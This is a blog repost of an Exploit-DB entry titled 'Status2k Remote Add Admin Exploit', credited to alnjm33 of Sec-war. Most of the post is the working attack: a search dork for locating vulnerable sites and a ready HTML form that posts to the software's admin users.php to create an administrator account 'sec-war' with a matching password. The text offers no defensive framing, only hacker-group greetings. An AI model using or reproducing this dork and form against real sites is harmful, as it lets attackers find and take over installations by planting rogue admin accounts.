27

Jan

Status2k Remote Add Admin Exploit

Posted by admin  Published in Hacking

# Title: Status2k Remote Add Admin Exploit
# EDB-ID: 11258
# CVE-ID: ()
# OSVDB-ID: ()
# Author: alnjm33
# Published: 2010-01-25
# Verified: no
# Download Exploit Code
# Download N/A

view source
print?
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : status2k Remote Add Admin Exploit
Author: alnjm33
Software Link: it cost 24.95 / y
Script Site : http://www.status2k.com/buynow.html
Version: 1
Tested on: Version 1
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork===
( allinurl:dynamicimg.php )
================================Exploit============
status2k Remote Add Admin

<form action=”http://server/Status2k/admin/options/users.php” method=”POST”> <input name=”type” type=”hidden” value=”add” />
<table style=”border-collapse: collapse” border=”1″ cellpadding=”4″ width=”100%” bordercolor=”#808080″>
<tbody>
<tr>
<td class=”top”>
<p align=”center”><strong>User &amp; Pass : sec-war</strong></p>

<p align=”center”><strong><span style=”font-family: Comic Sans MS;”>
<a style=”text-decoration: none” href=”http://server/path//index.php?act=idx”>
<span style=”color: #00ff00;”>Security War</span></a></span></strong>
<p align=”center”><strong>Username:</strong></p>
</td>
</tr>
<tr>
<td height=”1″>
<p align=”center”><input name=”adminuser” size=”30″ type=”text” value=”sec-war” /></p>
</td>
</tr>
<tr>
<td class=”top”>
<p align=”center”><strong>Password:</strong></p>
</td>
</tr>
<tr>
<td height=”22″>
<p align=”center”><input name=”adminpass” size=”30″ type=”password” value=”sec-war” /></p>
</td>
</tr>
<tr>
<td align=”right”>
<p align=”center”><input style=”font-weight: 700;” type=”submit” value=”Add User &gt;&gt;” /></p>
</td>
</tr>
</tbody></table>
</form>
=======================================================================================
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members

Related Articles

No user responded in this post

Subscribe to this post comment rss or trackback url
Leave A Reply

 Username (Required)

 Email Address (Remains Private)

 Website (Optional)